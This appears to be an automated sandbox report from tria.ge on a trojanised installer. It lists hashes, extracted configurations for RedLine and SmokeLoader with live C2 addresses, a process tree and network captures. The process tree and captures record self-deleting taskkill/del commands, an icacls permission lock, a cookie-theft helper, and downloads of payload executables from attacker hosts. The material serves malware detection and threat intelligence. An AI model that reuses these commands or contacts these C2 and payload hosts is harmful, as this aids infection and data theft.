Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/07/2024, 05:43 UTC

240711-gej4lstgrf 10

06/09/2021, 14:13 UTC

210906-rjpvrsedbm 10

08/07/2021, 11:08 UTC

210708-4gztl3mwl6 10

08/07/2021, 08:02 UTC

210708-klfb4qeda6 10

07/07/2021, 09:39 UTC

210707-nem57xyvf2 10

06/07/2021, 17:51 UTC

210706-7pcrmjy3fa 10

06/07/2021, 13:45 UTC

210706-eybelwcq86 10

Analysis

  • max time kernel
    18s
  • max time network
    308s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    28/06/2021, 15:53 UTC

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    setup_x86_x64_install - копия (13).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 44 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:868
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Modifies registry class
        PID:1352
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (13).exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (13).exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1940
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c arnatic_1.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_1.exe
              arnatic_1.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1800
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                6⤵
                  PID:2536
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im arnatic_1.exe /f
                    7⤵
                    • Kills process with taskkill
                    PID:2564
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2720
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c arnatic_2.exe
              4⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:824
              • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_2.exe
                arnatic_2.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1880
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c arnatic_3.exe
              4⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:276
              • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_3.exe
                arnatic_3.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:400
                • C:\Windows\SysWOW64\rUNdlL32.eXe
                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                  6⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2044
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c arnatic_4.exe
              4⤵
              • Loads dropped DLL
              PID:1760
              • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_4.exe
                arnatic_4.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:976
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1948
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  6⤵
                    PID:2104
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c arnatic_5.exe
                4⤵
                • Loads dropped DLL
                PID:1072
                • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_5.exe
                  arnatic_5.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1060
                  • C:\Users\Admin\AppData\Roaming\4316293.exe
                    "C:\Users\Admin\AppData\Roaming\4316293.exe"
                    6⤵
                      PID:912
                    • C:\Users\Admin\AppData\Roaming\3844751.exe
                      "C:\Users\Admin\AppData\Roaming\3844751.exe"
                      6⤵
                        PID:1680
                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                          7⤵
                            PID:1640
                        • C:\Users\Admin\AppData\Roaming\6243650.exe
                          "C:\Users\Admin\AppData\Roaming\6243650.exe"
                          6⤵
                            PID:720
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c arnatic_7.exe
                        4⤵
                        • Loads dropped DLL
                        PID:272
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c arnatic_6.exe
                        4⤵
                        • Loads dropped DLL
                        PID:1672
                • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
                  arnatic_7.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1408
                  • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
                    C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
                    2⤵
                      PID:1764
                    • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
                      C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_7.exe
                      2⤵
                        PID:1960
                    • C:\Users\Admin\AppData\Local\Temp\7zSCB7E8805\arnatic_6.exe
                      arnatic_6.exe
                      1⤵
                      • Executes dropped EXE
                      PID:792
                      • C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe
                        "C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe"
                        2⤵
                          PID:2144
                          • C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe
                            "C:\Users\Admin\Documents\HNyId4M7oNxMw87KN0VIjSrc.exe"
                            3⤵
                              PID:1912
                          • C:\Users\Admin\Documents\dz9WQL1PdDlZXNncwUDfARcj.exe
                            "C:\Users\Admin\Documents\dz9WQL1PdDlZXNncwUDfARcj.exe"
                            2⤵
                              PID:2128
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                3⤵
                                  PID:2328
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  3⤵
                                    PID:2820
                                • C:\Users\Admin\Documents\5rM7fwipKKUcI1_q522hXxRC.exe
                                  "C:\Users\Admin\Documents\5rM7fwipKKUcI1_q522hXxRC.exe"
                                  2⤵
                                    PID:2120
                                  • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
                                    "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
                                    2⤵
                                      PID:2200
                                      • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
                                        "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
                                        3⤵
                                          PID:2580
                                        • C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe
                                          "C:\Users\Admin\Documents\u3EiziyyYvLXfIaxE40G1DwJ.exe"
                                          3⤵
                                            PID:2704
                                        • C:\Users\Admin\Documents\1PVjIVI19flXRFoXeapzSVuk.exe
                                          "C:\Users\Admin\Documents\1PVjIVI19flXRFoXeapzSVuk.exe"
                                          2⤵
                                            PID:2172
                                          • C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe
                                            "C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe"
                                            2⤵
                                              PID:2224
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 0UlIW8lQMIOGUdEPwti__XaI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\0UlIW8lQMIOGUdEPwti__XaI.exe" & del C:\ProgramData\*.dll & exit
                                                3⤵
                                                  PID:2116
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im 0UlIW8lQMIOGUdEPwti__XaI.exe /f
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1600
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    4⤵
                                                    • Delays execution with timeout.exe
                                                    PID:824
                                              • C:\Users\Admin\Documents\7knLLIUqmKADFwZofzpMEp1D.exe
                                                "C:\Users\Admin\Documents\7knLLIUqmKADFwZofzpMEp1D.exe"
                                                2⤵
                                                  PID:2348
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 952
                                                    3⤵
                                                    • Program crash
                                                    PID:756
                                                • C:\Users\Admin\Documents\jlhL_mHbm6Sl4i65mBU7lVzy.exe
                                                  "C:\Users\Admin\Documents\jlhL_mHbm6Sl4i65mBU7lVzy.exe"
                                                  2⤵
                                                    PID:2360
                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                      3⤵
                                                        PID:2468
                                                    • C:\Users\Admin\Documents\EbefUJnXG3dXkpQTI2sHdm_X.exe
                                                      "C:\Users\Admin\Documents\EbefUJnXG3dXkpQTI2sHdm_X.exe"
                                                      2⤵
                                                        PID:2616
                                                    • C:\Users\Admin\AppData\Local\Temp\5A21.exe
                                                      C:\Users\Admin\AppData\Local\Temp\5A21.exe
                                                      1⤵
                                                        PID:1436
                                                        • C:\Users\Admin\AppData\Local\Temp\5A21.exe
                                                          C:\Users\Admin\AppData\Local\Temp\5A21.exe
                                                          2⤵
                                                            PID:1848
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Users\Admin\AppData\Local\10ec7627-dfdf-4741-a8f9-15de45a57a32" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                              3⤵
                                                              • Modifies file permissions
                                                              PID:2272
                                                            • C:\Users\Admin\AppData\Local\Temp\5A21.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\5A21.exe" --Admin IsNotAutoStart IsNotTask
                                                              3⤵
                                                                PID:2240
                                                          • C:\Users\Admin\AppData\Local\Temp\6AF4.exe
                                                            C:\Users\Admin\AppData\Local\Temp\6AF4.exe
                                                            1⤵
                                                              PID:2340
                                                            • C:\Users\Admin\AppData\Local\Temp\9233.exe
                                                              C:\Users\Admin\AppData\Local\Temp\9233.exe
                                                              1⤵
                                                                PID:856

                                                              Network

                                                              • flag-unknown
                                                                DNS
                                                                motiwa.xyz
                                                                setup_install.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                motiwa.xyz
                                                                IN A
                                                                Response
                                                                motiwa.xyz
                                                                IN A
                                                                104.21.12.59
                                                                motiwa.xyz
                                                                IN A
                                                                172.67.193.180
                                                              • flag-unknown
                                                                GET
                                                                http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                setup_install.exe
                                                                Remote address:
                                                                104.21.12.59:80
                                                                Request
                                                                GET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7 HTTP/1.1
                                                                Host: motiwa.xyz
                                                                Accept: */*
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f634200000012a3aa7f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vBhvJm7C7hWODKE3EKapiem2s%2BwIbgpunvN8fczydzqo9zlnUWCxCyVNzMQLfIJThPEzg6mgOualttll5B%2B35dKC4TyJFIAUANLGoufKegww0PelNyUXzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 6668263368e5012a-AMS
                                                              • flag-unknown
                                                                DNS
                                                                ip-api.com
                                                                arnatic_4.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ip-api.com
                                                                IN A
                                                                Response
                                                                ip-api.com
                                                                IN A
                                                                208.95.112.1
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/
                                                                arnatic_4.exe
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                viewport-width: 1920
                                                                Host: ip-api.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:11 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 323
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                              • flag-unknown
                                                                DNS
                                                                email.yg9.me
                                                                SystemNetworkService
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                email.yg9.me
                                                                IN A
                                                                Response
                                                                email.yg9.me
                                                                IN A
                                                                198.13.62.186
                                                              • flag-unknown
                                                                DNS
                                                                email.yg9.me
                                                                SystemNetworkService
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                email.yg9.me
                                                                IN AAAA
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                videoconvert-download38.xyz
                                                                arnatic_5.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                Response
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                172.67.201.250
                                                                videoconvert-download38.xyz
                                                                IN A
                                                                104.21.42.63
                                                              • flag-unknown
                                                                DNS
                                                                www.facebook.com
                                                                arnatic_4.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.facebook.com
                                                                IN A
                                                                Response
                                                                www.facebook.com
                                                                IN CNAME
                                                                star-mini.c10r.facebook.com
                                                                star-mini.c10r.facebook.com
                                                                IN A
                                                                31.13.83.36
                                                              • flag-unknown
                                                                DNS
                                                                iplogger.org
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iplogger.org
                                                                IN A
                                                                Response
                                                                iplogger.org
                                                                IN A
                                                                88.99.66.31
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/server.txt
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /server.txt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:25 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Thu, 17 Jun 2021 16:41:11 GMT
                                                                ETag: "13-5c4f8dfe8a764"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 19
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/plain
                                                              • flag-unknown
                                                                DNS
                                                                ipinfo.io
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ipinfo.io
                                                                IN A
                                                                Response
                                                                ipinfo.io
                                                                IN A
                                                                34.117.59.81
                                                              • flag-unknown
                                                                DNS
                                                                pki.goog
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                pki.goog
                                                                IN A
                                                                Response
                                                                pki.goog
                                                                IN A
                                                                216.239.32.29
                                                              • flag-unknown
                                                                GET
                                                                http://pki.goog/gsr1/gsr1.crt
                                                                Remote address:
                                                                216.239.32.29:80
                                                                Request
                                                                GET /gsr1/gsr1.crt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                Host: pki.goog
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Accept-Ranges: bytes
                                                                Vary: Accept-Encoding
                                                                Content-Type: application/pkix-cert
                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                Cross-Origin-Resource-Policy: same-site
                                                                Content-Length: 889
                                                                Date: Mon, 28 Jun 2021 15:26:12 GMT
                                                                Expires: Mon, 28 Jun 2021 16:26:12 GMT
                                                                Last-Modified: Wed, 20 May 2020 16:45:00 GMT
                                                                X-Content-Type-Options: nosniff
                                                                Server: sffe
                                                                X-XSS-Protection: 0
                                                                Age: 2295
                                                                Cache-Control: public, max-age=3600
                                                              • flag-unknown
                                                                DNS
                                                                sergeevih43.tumblr.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                Response
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                74.114.154.22
                                                                sergeevih43.tumblr.com
                                                                IN A
                                                                74.114.154.18
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:28 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:28 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 1516
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                DNS
                                                                freeprivacytoolsforyou.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                freeprivacytoolsforyou.xyz
                                                                IN A
                                                                Response
                                                                freeprivacytoolsforyou.xyz
                                                                IN A
                                                                45.133.245.228
                                                              • flag-unknown
                                                                HEAD
                                                                http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
                                                                Remote address:
                                                                45.133.245.228:80
                                                                Request
                                                                HEAD /downloads/toolspab2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: freeprivacytoolsforyou.xyz
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 368640
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Last-Modified: Mon, 28 Jun 2021 16:04:01 GMT
                                                                ETag: "5a000-5c5d5a342b63f"
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
                                                                Remote address:
                                                                45.133.245.228:80
                                                                Request
                                                                GET /downloads/toolspab2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: freeprivacytoolsforyou.xyz
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 368640
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Last-Modified: Mon, 28 Jun 2021 16:04:01 GMT
                                                                ETag: "5a000-5c5d5a342b63f"
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                DNS
                                                                cdn.discordapp.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                cdn.discordapp.com
                                                                IN A
                                                                Response
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.129.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.135.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.133.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.130.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.134.233
                                                              • flag-unknown
                                                                DNS
                                                                jom.diregame.live
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                jom.diregame.live
                                                                IN A
                                                                Response
                                                                jom.diregame.live
                                                                IN A
                                                                172.67.158.82
                                                                jom.diregame.live
                                                                IN A
                                                                104.21.65.45
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                HEAD
                                                                http://136.144.41.133/WW/file7.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file7.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:18:16 GMT
                                                                ETag: "122bd0-5c5d4ffa2612d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1190864
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                HEAD
                                                                http://136.144.41.133/WW/file1.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file1.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 07:24:03 GMT
                                                                ETag: "b0c00-5c5ba41def8db"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 723968
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file2.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
